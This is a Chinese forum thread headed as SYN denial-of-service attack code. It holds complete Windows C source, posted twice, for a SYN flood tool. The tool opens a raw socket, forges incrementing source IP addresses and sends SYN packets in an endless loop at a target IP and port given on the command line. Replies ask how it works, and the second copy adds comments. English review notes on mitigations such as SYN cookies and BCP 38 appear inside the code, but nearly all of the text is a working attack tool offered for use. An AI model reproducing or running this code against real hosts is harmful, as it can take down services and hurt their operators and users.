----  syn拒绝服务攻击代码  (http://bbs.xml.org.cn/dispbbs.asp?boardid=65&rootid=&id=54463)


--  作者:huqige
--  发布时间:10/26/2007 9:11:00 PM

--  syn拒绝服务攻击代码
#include <winsock2.h>
#include <Ws2tcpip.h>
#include <windows.h>
#include <stdio.h>

#pragma comment(lib,"ws2_32")
#pragma comment(lib,"wsock32")
/* Base address for the forged source field: main() converts it with
 * inet_addr()/ntohl() and flood() adds a per-packet counter to it. */
#define FAKE_IP "201.79.131.18"
/* Base TCP sequence number; the same per-packet counter is added to it. */
#define SEQ 0x28376839
/* Banner string printed by main(). */
#define right "===============Coder Paris-ye====================\n"
/* Ones'-complement checksum used for the TCP and IP checksum fields. */
USHORT checksum(USHORT *buffer, int size);
/* Send loop; main() starts it on its own thread. */
int flood();

/*
 * Hand-rolled TCP header with no options. The fields are copied byte-for-byte
 * into the send buffer, so field order and widths are the wire layout.
 * No packing pragma is visible; the code relies on the compiler's natural
 * alignment giving the expected size (presumably 20 bytes - confirm).
 */
typedef struct tcphdr
{
 USHORT th_sport;          /* source port, written with htons() by main()/flood() */
 USHORT th_dport;          /* destination port, written with htons() by main() */
 unsigned int th_seq;      /* sequence number */
 unsigned int th_ack;      /* acknowledgment number; main() sets it to 0 */
 unsigned char th_lenres;  /* header length (32-bit words) in the high nibble, reserved bits low */
 unsigned char th_flag;    /* TCP flag bits; main() sets 2, the SYN bit */
 USHORT th_win;            /* advertised window */
 USHORT th_sum;            /* TCP checksum, recomputed by flood() for every packet */
 USHORT th_urp;            /* urgent pointer; main() sets it to 0 */
}TCP_HEADER;

/*
 * Hand-rolled IPv4 header with no options. It is supplied by the program
 * itself because main() enables IP_HDRINCL on the raw socket, which is what
 * allows the source address field to hold an address other than the sender's.
 */
typedef struct iphdr
{
 unsigned char h_verlen;         /* IP version (high nibble) and header length in 32-bit words (low nibble) */
 unsigned char tos;              /* type of service; never assigned in this file */
 unsigned short total_len;       /* total packet length, written with htons() by main() */
 unsigned short ident;           /* identification; main() sets the constant 1 */
 unsigned short frag_and_flags;  /* flags and fragment offset; main() sets 0 */
 unsigned char  ttl;             /* time to live; main() sets 128 */
 unsigned char proto;            /* payload protocol; main() sets IPPROTO_TCP */
 unsigned short checksum;        /* header checksum, recomputed by flood() */
 unsigned int sourceIP;          /* source address - forged from FAKE_IP plus a counter */
 unsigned int destIP;            /* destination address taken from argv[1] */
}IP_HEADER;

/*
 * TCP pseudo-header, used only as checksum input and never transmitted.
 * This declares a single global object named PSD_HEADER of an unnamed
 * struct type. Assumes unsigned long is 32 bits wide - TODO confirm for
 * the compiler in use.
 */
struct
{
 unsigned long saddr;   /* source address, copied from ipheader.sourceIP */
 unsigned long daddr;   /* destination address, copied from ipheader.destIP */
 char mbz;              /* "must be zero" byte; main() sets 0 */
 char ptcl;             /* protocol number; main() sets IPPROTO_TCP */
 unsigned short tcpl;   /* TCP length, htons(sizeof(tcpheader)) */
}PSD_HEADER;

/*
 * File-scope state shared by main() and the flood() thread. No lock or
 * atomic is visible anywhere in the file, so the two threads access these
 * objects unsynchronised.
 */
WSADATA wsaData;                    /* filled in by WSAStartup() */
SOCKET  sockMain = (SOCKET) NULL;   /* the raw socket used for every send */
/* ErrorCode: last API result; flag: IP_HDRINCL option value; TimeOut: value passed
 * for SO_SNDTIMEO; FakeIpNet/FakeIpHost: FAKE_IP in network/host byte order;
 * dataSize: bytes passed to sendto(); SendSEQ: per-packet counter added to both
 * the forged source address and the sequence number. */
int ErrorCode=0,flag=true,TimeOut=2000,FakeIpNet,FakeIpHost,dataSize=0,SendSEQ=0;
unsigned short activPort=40000;     /* rotating source port, advanced by flood() */
struct sockaddr_in sockAddr;        /* destination passed to sendto() */
TCP_HEADER  tcpheader;              /* TCP header template, patched per packet */
IP_HEADER   ipheader;               /* IP header template, patched per packet */
char        sendBuf[128];           /* scratch buffer for checksum input and the outgoing packet */

/*
 * Ones'-complement checksum in the style used by IP and TCP headers.
 *
 * buffer: data to sum, read as consecutive 16-bit words.
 * size:   number of bytes to cover; a leftover byte after the last full
 *         word is added as an 8-bit value.
 * Returns the bitwise complement of the folded 16-bit sum.
 */
USHORT checksum(USHORT *buffer, int size)
{
 const USHORT *word = buffer;
 unsigned long sum = 0;
 int remaining;

 /* Add every complete 16-bit word. */
 for (remaining = size; remaining > 1; remaining -= 2)
 {
  sum += *word++;
 }

 /* Add the trailing byte, if any is left over. */
 if (remaining != 0)
 {
  sum += *(const UCHAR *)word;
 }

 /* Fold the carries above bit 15 back into the low 16 bits, twice. */
 sum = (sum & 0xffff) + (sum >> 16);
 sum += sum >> 16;

 return (USHORT)~sum;
}


/*
 * Program entry point. Expects exactly two arguments, <IP> and <port>.
 * It initialises Winsock, opens a raw IPv4 socket on which the program
 * supplies its own IP header (IP_HDRINCL), fills the global IP, TCP and
 * pseudo-header templates, and runs flood() on a separate thread until
 * getchar() returns.
 *
 * Returns 0 after the thread has been stopped, 1 on wrong usage, and 2-5
 * when WSAStartup, WSASocket or one of the two setsockopt calls fails.
 *
 * Review notes (defensive reading):
 *  - The source address placed in the IP header is derived from FAKE_IP,
 *    not from the sending host, so the receiver's SYN-ACK replies go to
 *    addresses that never asked for them. Networks that validate source
 *    addresses at their edge (ingress filtering, BCP 38) drop such packets.
 *  - Every packet built from these templates carries the same IP
 *    identification (1), initial TTL (128), window (16384) and a TCP header
 *    without options; constant fields like these are what a detection rule
 *    can key on.
 *  - NOTE(review): Microsoft's raw-socket documentation describes limits on
 *    sending TCP segments and forged source addresses through raw sockets in
 *    later Windows releases - confirm for the platform under study.
 */
int main(int argc,char* argv[])
{
 int    portNum=0;
 DWORD  dw;
 HANDLE hThread=NULL;
 char   putInfo;

 /* Usage check: program name plus exactly two arguments. */
 if(argc!=3)
 {
  printf("%s\n",right);
  printf("Invalid command,Pls use:\n%s  <IP> <port>\nExample:%s 192.168.100.244 80",argv[0],argv[0]);
  return 1;
 }
 /* Request Winsock version 2.1. */
 if((ErrorCode=WSAStartup(MAKEWORD(2,1),&wsaData))!=0){
         printf("WSAStartup failed: %d\n",ErrorCode);
         return 2;
 }
 /* Raw socket: the program, not the TCP/IP stack, builds the packet. */
 sockMain=WSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED);
 if(sockMain==INVALID_SOCKET)
 {
  printf("Socket failed: %d\n",WSAGetLastError());
 return 3;
 }
 /* IP_HDRINCL: the buffer handed to sendto() already starts with an IP header. */
 ErrorCode=setsockopt(sockMain,IPPROTO_IP,IP_HDRINCL,(char *)&flag,sizeof(int));
 if(ErrorCode==SOCKET_ERROR)
 {
         printf("Set sockopt failed: %d\n",WSAGetLastError());
  return 4;
 }
 /* Send timeout, taken from the global TimeOut (2000). */
 ErrorCode=setsockopt(sockMain,SOL_SOCKET,SO_SNDTIMEO,(char*)&TimeOut,sizeof(TimeOut));
 if(ErrorCode==SOCKET_ERROR)
 {
         printf("Set sockopt time out failed: %d\n",WSAGetLastError());
 return 5;
 }
 /* Neither argument is validated: atoi() and inet_addr() results are used as returned. */
 portNum=atoi(argv[2]);

 memset(&sockAddr,0,sizeof(sockAddr));
 sockAddr.sin_family=AF_INET;
 sockAddr.sin_addr.s_addr =inet_addr(argv[1]);
 /* Keep the forged base address in host order so flood() can add a counter to it. */
 FakeIpNet=inet_addr(FAKE_IP);
 FakeIpHost=ntohl(FakeIpNet);

 /* IP header template: version 4, header length expressed in 32-bit words. */
 ipheader.h_verlen=(4<<4 | sizeof(IP_HEADER)/sizeof(unsigned long));
 ipheader.total_len = htons(sizeof(IP_HEADER)+sizeof(TCP_HEADER));
 ipheader.ident = 1;
 ipheader.frag_and_flags = 0;
 ipheader.ttl = 128;
 ipheader.proto = IPPROTO_TCP;
 ipheader.checksum =0;
 ipheader.sourceIP = htonl(FakeIpHost+SendSEQ);   /* forged source address */
 ipheader.destIP = inet_addr(argv[1]);

 /* TCP header template; flood() overwrites the source port before each send. */
 tcpheader.th_dport=htons(portNum);
 tcpheader.th_sport = htons(portNum);
 tcpheader.th_seq = htonl(SEQ+SendSEQ);
 tcpheader.th_ack = 0;
 tcpheader.th_lenres =(sizeof(TCP_HEADER)/4<<4|0);   /* header length in 32-bit words, high nibble */
 tcpheader.th_flag = 2;                              /* SYN bit only */
 tcpheader.th_win = htons(16384);
 tcpheader.th_urp = 0;
 tcpheader.th_sum = 0;

 /* Pseudo-header used only as input to the TCP checksum. */
 PSD_HEADER.saddr=ipheader.sourceIP;
 PSD_HEADER.daddr=ipheader.destIP;
 PSD_HEADER.mbz=0;
 PSD_HEADER.ptcl=IPPROTO_TCP;
 PSD_HEADER.tcpl=htons(sizeof(tcpheader));
 printf("%s\n",right);
 /* The worker is created suspended, raised to highest priority, then resumed.
  * The handle returned by CreateThread is not checked before use. */
 hThread=CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)flood,0,CREATE_SUSPENDED,&dw);
 SetThreadPriority(hThread,THREAD_PRIORITY_HIGHEST);
 ResumeThread(hThread);
 printf("Warning[start]...........\nPress any key to stop!\n");
 /* Block until input arrives, then stop the worker abruptly. */
 putInfo=getchar();
 TerminateThread(hThread,0);
 WSACleanup();
 printf("\nStopd...........\n");

 return 0;
}

/*
 * Worker loop started by main(). Each pass patches the global header
 * templates (new forged source address, sequence number and source port),
 * recomputes both checksums and hands one SYN-only packet of
 * sizeof(ipheader)+sizeof(tcpheader) bytes to sendto(). There is no delay
 * between passes; the only exit is ExitThread(1) when sendto() fails, so
 * the trailing return is not reached.
 *
 * Review notes (defensive reading): the sender never answers the SYN-ACK,
 * so each packet can leave a half-open connection on the receiving
 * listener until it times out. The usual countermeasures are SYN cookies
 * on the host, SYN rate limiting or proxying at the network edge, and
 * source-address validation (BCP 38) on the sender's network. On the wire
 * the traffic shows up as option-less SYNs to one destination port from
 * consecutively numbered source addresses and source ports.
 */
int flood()
{
 while(1)
 {
  /* Per-packet counter; set back to 1 after it has reached 65536. */
  if(SendSEQ++==65536) SendSEQ=1;
  /* Source port advances by one per packet and jumps to 1000 after 40010. */
  if(activPort++==40010) activPort=1000;
  ipheader.checksum =0;
  ipheader.sourceIP = htonl(FakeIpHost+SendSEQ);
  tcpheader.th_seq = htonl(SEQ+SendSEQ);
  tcpheader.th_sport = htons(activPort);
  tcpheader.th_sum = 0;
  PSD_HEADER.saddr=ipheader.sourceIP;
  /* TCP checksum input: pseudo-header followed by the TCP header. */
  memcpy(sendBuf,&PSD_HEADER,sizeof(PSD_HEADER));
  memcpy(sendBuf+sizeof(PSD_HEADER),&tcpheader,sizeof(tcpheader));
  tcpheader.th_sum=checksum((USHORT *)sendBuf,sizeof(PSD_HEADER)+sizeof(tcpheader));

  /* The same buffer is now reused for the outgoing packet: IP header, then TCP header. */
  memcpy(sendBuf,&ipheader,sizeof(ipheader));
  memcpy(sendBuf+sizeof(ipheader),&tcpheader,sizeof(tcpheader));
  memset(sendBuf+sizeof(ipheader)+sizeof(tcpheader),0,4);
  dataSize=sizeof(ipheader)+sizeof(tcpheader);
  /* The IP checksum is computed over dataSize bytes of the buffer, then the header is copied in again. */
  ipheader.checksum=checksum((USHORT *)sendBuf,dataSize);
  memcpy(sendBuf,&ipheader,sizeof(ipheader));
  ErrorCode=sendto(sockMain,sendBuf,dataSize,0,(struct sockaddr*) &sockAddr,sizeof(sockAddr));
  if(ErrorCode==SOCKET_ERROR)
  {
   printf("\nCan't connect this IP!Pls check it.\n");
   ExitThread(1);
  }
  // Sleep(1000);
 }
 return 0;
}


--  作者:changeone
--  发布时间:11/8/2007 5:58:00 PM

--  
能把这段代码的原理解释一下吗?看不太懂
--  作者:huyin
--  发布时间:3/10/2008 9:13:00 PM

--  
里面的那个IP是指什么??


--  作者:秋十三
--  发布时间:1/4/2009 6:32:00 PM

--  
好很棒啊
--  作者:huqige
--  发布时间:1/5/2009 5:11:00 PM

--  
#include <winsock2.h>
#include <Ws2tcpip.h>
#include <windows.h>
#include <stdio.h>
//加载头文件就和导入包类一样
#pragma comment(lib,"ws2_32")
#pragma comment(lib,"wsock32")
#define FAKE_IP "201.79.131.18"
// The address is arbitrary: it is only the base for the forged source field
// (main() converts it and flood() adds a per-packet counter to it).
#define SEQ 0x28376839
#define right "===============Coder Paris-ye====================\n"
// Forward declarations
USHORT checksum(USHORT *buffer, int size);
int flood();
// Hand-rolled TCP header with no options. The fields are copied byte-for-byte
// into the send buffer, so field order and widths are the wire layout.
typedef struct tcphdr
{
USHORT th_sport;          // source port
USHORT th_dport;          // destination port
unsigned int th_seq;      // sequence number
unsigned int th_ack;      // acknowledgment number; main() sets it to 0
unsigned char th_lenres;  // header length (32-bit words) in the high nibble, reserved bits low
unsigned char th_flag;    // TCP flag bits; main() sets 2, the SYN bit
USHORT th_win;            // advertised window
USHORT th_sum;            // TCP checksum, recomputed by flood() for every packet
USHORT th_urp;            // urgent pointer; main() sets it to 0
}TCP_HEADER;
// The structure above holds the TCP header
// Hand-rolled IPv4 header with no options. The program supplies it itself
// because main() enables IP_HDRINCL on the raw socket, which is what lets the
// source address field hold an address other than the sender's.
typedef struct iphdr
{
unsigned char h_verlen;         // IP version (high nibble) and header length in 32-bit words (low nibble)
unsigned char tos;              // type of service; never assigned in this file
unsigned short total_len;       // total packet length
unsigned short ident;           // identification; main() sets the constant 1
unsigned short frag_and_flags;  // flags and fragment offset; main() sets 0
unsigned char  ttl;             // time to live; main() sets 128
unsigned char proto;            // payload protocol; main() sets IPPROTO_TCP
unsigned short checksum;        // header checksum, recomputed by flood()
unsigned int sourceIP;          // source address - forged from FAKE_IP plus a counter
unsigned int destIP;            // destination address taken from argv[1]
}IP_HEADER;
// TCP pseudo-header, used only as checksum input and never transmitted.
// This declares a single global object named PSD_HEADER of an unnamed struct
// type. Assumes unsigned long is 32 bits wide - TODO confirm for the compiler in use.
struct
{
unsigned long saddr;   // source address, copied from ipheader.sourceIP
unsigned long daddr;   // destination address, copied from ipheader.destIP
char mbz;              // "must be zero" byte; main() sets 0
char ptcl;             // protocol number; main() sets IPPROTO_TCP
unsigned short tcpl;   // TCP length, htons(sizeof(tcpheader))
}PSD_HEADER;
// File-scope state shared by main() and the flood() thread. No lock or atomic
// is visible anywhere in the file, so the two threads access it unsynchronised.
WSADATA wsaData;                    // filled in by WSAStartup()
SOCKET  sockMain = (SOCKET) NULL;   // the raw socket used for every send
// ErrorCode: last API result; flag: IP_HDRINCL option value; TimeOut: value passed
// for SO_SNDTIMEO; FakeIpNet/FakeIpHost: FAKE_IP in network/host byte order;
// dataSize: bytes passed to sendto(); SendSEQ: per-packet counter.
int ErrorCode=0,flag=true,TimeOut=2000,FakeIpNet,FakeIpHost,dataSize=0,SendSEQ=0;
unsigned short activPort=40000;     // rotating source port, advanced by flood()
struct sockaddr_in sockAddr;        // destination passed to sendto()
TCP_HEADER  tcpheader;              // TCP header template, patched per packet
IP_HEADER   ipheader; // author's analogy: like creating an object with "new"; this is the IP header template
char        sendBuf[128];           // scratch buffer for checksum input and the outgoing packet
// Ones'-complement checksum in the style used by IP and TCP headers.
// buffer: data to sum, read as consecutive 16-bit words.
// size:   number of bytes to cover; a leftover byte after the last full word
//         is added as an 8-bit value.
// Returns the bitwise complement of the folded 16-bit sum.
USHORT checksum(USHORT *buffer, int size)
{
    const USHORT *word = buffer;
    unsigned long sum = 0;
    int remaining;

    // Add every complete 16-bit word.
    for (remaining = size; remaining > 1; remaining -= 2)
    {
        sum += *word++;
    }

    // Add the trailing byte, if any is left over.
    if (remaining != 0)
    {
        sum += *(const UCHAR *)word;
    }

    // Fold the carries above bit 15 back into the low 16 bits, twice.
    sum = (sum & 0xffff) + (sum >> 16);
    sum += sum >> 16;

    return (USHORT)~sum;
}

// Program entry point. Expects exactly two arguments, <IP> and <port>.
// It initialises Winsock, opens a raw IPv4 socket on which the program supplies
// its own IP header (IP_HDRINCL), fills the global IP, TCP and pseudo-header
// templates, and runs flood() on a separate thread until getchar() returns.
// Returns 0 after the thread has been stopped, 1 on wrong usage, and 2-5 when
// WSAStartup, WSASocket or one of the two setsockopt calls fails.
//
// Review notes (defensive reading): the source address in the IP header is
// derived from FAKE_IP, not from the sending host, so the receiver's SYN-ACK
// replies go to addresses that never asked for them; networks that validate
// source addresses at their edge (ingress filtering, BCP 38) drop such packets.
// The constant identification (1), TTL (128), window (16384) and option-less
// TCP header are fields a detection rule can key on.
int main(int argc,char* argv[])
{
int    portNum=0;
DWORD  dw;
HANDLE hThread=NULL;
char   putInfo;
// Usage check: program name plus exactly two arguments.
if(argc!=3)
{
  printf("%s\n",right);
  printf("Invalid command,Pls use:\n%s  <IP> <port>\nExample:%s 192.168.100.244 80",argv[0],argv[0]);
  return 1;
}
// Request Winsock version 2.1.
if((ErrorCode=WSAStartup(MAKEWORD(2,1),&wsaData))!=0){
         printf("WSAStartup failed: %d\n",ErrorCode);
         return 2;
}
sockMain=WSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED);
// Create the raw socket: the program, not the TCP/IP stack, builds the packet.
if(sockMain==INVALID_SOCKET)
{
  printf("Socket failed: %d\n",WSAGetLastError());
return 3;
}
// IP_HDRINCL: the buffer handed to sendto() already starts with an IP header.
ErrorCode=setsockopt(sockMain,IPPROTO_IP,IP_HDRINCL,(char *)&flag,sizeof(int));
if(ErrorCode==SOCKET_ERROR)
{
         printf("Set sockopt failed: %d\n",WSAGetLastError());
  return 4;
}
// Send timeout, taken from the global TimeOut (2000).
ErrorCode=setsockopt(sockMain,SOL_SOCKET,SO_SNDTIMEO,(char*)&TimeOut,sizeof(TimeOut));
if(ErrorCode==SOCKET_ERROR)
{
         printf("Set sockopt time out failed: %d\n",WSAGetLastError());
return 5;
}
// Neither argument is validated: atoi() and inet_addr() results are used as returned.
portNum=atoi(argv[2]);
memset(&sockAddr,0,sizeof(sockAddr));
sockAddr.sin_family=AF_INET; // address family AF_INET (IPv4); the original note calls it Windows-specific, but it is the standard sockets constant
sockAddr.sin_addr.s_addr =inet_addr(argv[1]);
// Keep the forged base address in host order so flood() can add a counter to it.
FakeIpNet=inet_addr(FAKE_IP);
FakeIpHost=ntohl(FakeIpNet);
ipheader.h_verlen=(4<<4 | sizeof(IP_HEADER)/sizeof(unsigned long));
ipheader.total_len = htons(sizeof(IP_HEADER)+sizeof(TCP_HEADER));
ipheader.ident = 1;
ipheader.frag_and_flags = 0; // flags and fragment offset
ipheader.ttl = 128; // time to live
ipheader.proto = IPPROTO_TCP; // payload protocol: TCP
ipheader.checksum =0;
ipheader.sourceIP = htonl(FakeIpHost+SendSEQ); // source address (forged)
ipheader.destIP = inet_addr(argv[1]);
tcpheader.th_dport=htons(portNum);
tcpheader.th_sport = htons(portNum);
tcpheader.th_seq = htonl(SEQ+SendSEQ);
tcpheader.th_ack = 0; // acknowledgment number is zero: this is the first segment of the TCP three-way handshake
tcpheader.th_lenres =(sizeof(TCP_HEADER)/4<<4|0);
tcpheader.th_flag = 2; // SYN bit only
tcpheader.th_win = htons(16384);
tcpheader.th_urp = 0;
tcpheader.th_sum = 0;
// Pseudo-header used only as input to the TCP checksum.
PSD_HEADER.saddr=ipheader.sourceIP;
PSD_HEADER.daddr=ipheader.destIP;
PSD_HEADER.mbz=0;
PSD_HEADER.ptcl=IPPROTO_TCP;
PSD_HEADER.tcpl=htons(sizeof(tcpheader));
printf("%s\n",right);
// The worker is created suspended, raised to highest priority, then resumed.
// The handle returned by CreateThread is not checked before use.
hThread=CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)flood,0,CREATE_SUSPENDED,&dw);
SetThreadPriority(hThread,THREAD_PRIORITY_HIGHEST);
ResumeThread(hThread);
printf("Warning[start]...........\nPress any key to stop!\n");
// Block until input arrives, then stop the worker abruptly.
putInfo=getchar();
TerminateThread(hThread,0);
WSACleanup();
printf("\nStopd...........\n");
return 0;
}

// Worker loop started by main(). Each pass patches the global header templates
// (new forged source address, sequence number and source port), recomputes both
// checksums and hands one SYN-only packet of sizeof(ipheader)+sizeof(tcpheader)
// bytes to sendto(). There is no delay between passes; the only exit is
// ExitThread(1) when sendto() fails, so the trailing return is not reached.
//
// Review notes (defensive reading): the sender never answers the SYN-ACK, so
// each packet can leave a half-open connection on the receiving listener until
// it times out. The usual countermeasures are SYN cookies on the host, SYN rate
// limiting or proxying at the network edge, and source-address validation
// (BCP 38) on the sender's network.
int flood()
{
while(1)
{
  // Per-packet counter; set back to 1 after it has reached 65536.
  if(SendSEQ++==65536) SendSEQ=1;
  // Source port advances by one per packet and jumps to 1000 after 40010.
  if(activPort++==40010) activPort=1000;
  ipheader.checksum =0;
  ipheader.sourceIP = htonl(FakeIpHost+SendSEQ);
  tcpheader.th_seq = htonl(SEQ+SendSEQ);
  tcpheader.th_sport = htons(activPort);
  tcpheader.th_sum = 0;
  PSD_HEADER.saddr=ipheader.sourceIP;
  // TCP checksum input: pseudo-header followed by the TCP header.
  memcpy(sendBuf,&PSD_HEADER,sizeof(PSD_HEADER));
  memcpy(sendBuf+sizeof(PSD_HEADER),&tcpheader,sizeof(tcpheader));
  tcpheader.th_sum=checksum((USHORT *)sendBuf,sizeof(PSD_HEADER)+sizeof(tcpheader));
  // The same buffer is now reused for the outgoing packet: IP header, then TCP header.
  memcpy(sendBuf,&ipheader,sizeof(ipheader));
  memcpy(sendBuf+sizeof(ipheader),&tcpheader,sizeof(tcpheader));
  memset(sendBuf+sizeof(ipheader)+sizeof(tcpheader),0,4);
  dataSize=sizeof(ipheader)+sizeof(tcpheader);
  // The IP checksum is computed over dataSize bytes of the buffer, then the header is copied in again.
  ipheader.checksum=checksum((USHORT *)sendBuf,dataSize);
  memcpy(sendBuf,&ipheader,sizeof(ipheader));
  ErrorCode=sendto(sockMain,sendBuf,dataSize,0,(struct sockaddr*) &sockAddr,sizeof(sockAddr));
  if(ErrorCode==SOCKET_ERROR)
  {
   printf("无法连接次地址。请检查并更正\n");
   ExitThread(1);
  }

}
return 0;
}
加了点注释,还有什么 不清楚的 就说

